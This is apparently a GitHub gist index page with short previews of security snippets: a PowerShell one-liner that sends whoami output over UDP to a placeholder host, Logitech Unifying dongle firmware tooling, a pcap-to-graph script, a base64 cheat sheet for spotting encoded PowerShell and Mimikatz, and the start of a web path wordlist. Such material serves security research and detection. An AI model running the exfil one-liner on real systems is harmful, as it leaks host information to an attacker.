This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# On your host: | |
# $ nc -lnvup 53 | |
# Replace <HOSTIP> with ip of the listening machine | |
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# 0. place this script in your ghidra_script directory | |
# 1. open the target nRF24LU1P binary in Ghidra | |
# 2. open the python shell in Ghidra | |
# 3. `import logitech; l = logitech.logitech(currentProgram); l.do_it() | |
import ghidra | |
from ghidra.program.model.symbol import SourceType | |
class logitech(object): | |
def __init__(self, currentProgram): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# sorry this is Python 2 -- the bootloader trigger breaks with Python 3 and I was too lazy to debug | |
import usb, time, struct | |
# Logitech Unifying dongle | |
class unifying_dongle: | |
# constructor |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from scapy.all import * | |
from py2neo import Graph, Node, Relationship | |
packets = rdpcap("<your_pcap_file>") | |
g = Graph(password="<your_neo4j_password>") | |
for packet in packets.sessions(): | |
pkt = packet.split() |
Base64 Code | Mnemonic Aid | Decoded* | Description |
---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
📺 Television | MZ |
MZ header |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
🐣 Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
🐣 Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
💪 "Pah!" | <. |
Often used by Emotet (UTF-16) |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/ | |
$$$lang-translate.service.js.aspx | |
$367-Million-Merger-Blocked.html | |
$defaultnav | |
${idfwbonavigation}.xml | |
$_news.php | |
$search2 | |
£º | |
.0 | |
/0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# TROOPERS2019 | |
# @doegox | |
# The script will resize the image and convert it to BW image if needed but | |
# I would advise to do it yourself first with e.g. Gimp for a better control | |
# of the aspect ration and the BW threshold. | |
# Target: 296x128, black & white (no grey) | |
# Shall we display the result locally? |
NewerOlder